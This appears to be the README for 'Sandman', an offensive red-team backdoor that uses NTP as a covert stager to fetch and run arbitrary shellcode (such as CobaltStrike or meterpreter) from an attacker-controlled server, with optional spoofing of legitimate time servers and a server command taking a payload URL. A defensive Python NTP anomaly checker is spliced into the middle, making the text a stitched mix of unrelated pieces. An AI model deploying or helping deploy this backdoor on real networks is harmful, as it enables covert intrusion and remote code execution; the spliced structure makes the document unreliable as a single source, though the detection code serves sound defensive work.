Sandman: NTP based backdoor for red team engagements
Sandman is a backdoor meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (a protocol for syncing time and date) to fetch and run arbitrary shellcode from a predefined server.
NTP is a protocol that is overlooked by many defenders, which results in wide network accessibility.
- Getting and executing an arbitrary payload from an attacker-controlled server.
- Can work on hardened networks since NTP is usually allowed through firewalls.
- Impersonating a legitimate NTP server via IP spoofing.
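A defender-side counterpart to the channel described above, added here as an example and not part of the Sandman project: a small Python checker that decodes the fixed NTP header of UDP/123 datagrams and flags traffic that does not look like ordinary client/server time sync (server replies from sources outside an allow-list, bytes beyond the 48-byte header, odd version or mode). The allow-list address and the sample datagrams are constructed for the example.

```python
import struct

NTP_HEADER_LEN = 48                      # RFC 5905 fixed header; a plain time query/reply is exactly this long
APPROVED_NTP_SERVERS = {"10.0.0.123"}    # assumed allow-list of the organisation's own time sources

def parse_ntp_header(payload: bytes) -> dict:
    """Decode the fixed NTP header fields; raises ValueError if the datagram is too short."""
    if len(payload) < NTP_HEADER_LEN:
        raise ValueError("payload shorter than NTP header")
    first, stratum, _poll, _precision = struct.unpack("!BBbb", payload[:4])
    return {
        "leap": first >> 6,
        "version": (first >> 3) & 0x7,
        "mode": first & 0x7,              # 3 = client, 4 = server
        "stratum": stratum,
        "extra_bytes": len(payload) - NTP_HEADER_LEN,
    }

def flag_ntp_packet(src_ip: str, payload: bytes) -> list:
    """Return the reasons a UDP/123 datagram looks unlike ordinary time sync (empty = benign)."""
    try:
        hdr = parse_ntp_header(payload)
    except ValueError as exc:
        return [str(exc)]
    reasons = []
    if hdr["version"] not in (3, 4):
        reasons.append(f"unusual NTP version {hdr['version']}")
    if hdr["mode"] not in (3, 4):
        reasons.append(f"unexpected mode {hdr['mode']}")
    if hdr["mode"] == 4 and src_ip not in APPROVED_NTP_SERVERS:
        reasons.append(f"server reply from non-approved source {src_ip}")
    # Caveat: authenticated NTP (symmetric-key MAC, NTS) legitimately carries extra bytes,
    # so tune this threshold to what your approved servers actually send.
    if hdr["extra_bytes"] > 0:
        reasons.append(f"{hdr['extra_bytes']} bytes beyond the {NTP_HEADER_LEN}-byte header")
    return reasons

def build_ntp(version: int, mode: int, extra: bytes = b"") -> bytes:
    """Constructed sample datagram: first header byte, zeroed remaining fields, optional trailing bytes."""
    return bytes([(version << 3) | mode]) + b"\x00" * (NTP_HEADER_LEN - 1) + extra

if __name__ == "__main__":
    samples = [
        ("10.0.0.5", build_ntp(4, 3)),                      # client query from a workstation
        ("10.0.0.123", build_ntp(4, 4)),                    # reply from the approved server
        ("203.0.113.9", build_ntp(4, 4, b"\x90" * 200)),    # oversized reply from an unknown host
    ]
    for src, pkt in samples:
        print(src, flag_ntp_packet(src, pkt) or "ok")
```

Feed it the UDP payloads from a pcap or a sensor to turn the returned reasons into alerts; the allow-list and size threshold are the two knobs to baseline per environment.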
- Python 3.9
- Requirements are specified in the requirements file.
git clone https://github.com/Idov31/Sandman.git
To compile the backdoor itself I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and csc.
Run on a Windows / *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
Payload Url: The URL to your shellcode. It could be your agent (for example, CobaltStrike or meterpreter) or another stager.
IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address). TBA
To start, compile the SandmanBackdoor. Because it is a single lightweight C# executable, you can execute it via ExecuteAssembly, run it as an NTP provider (TBA), or just execute/inject it.
Copyright (c) 2022, Ido Veltzman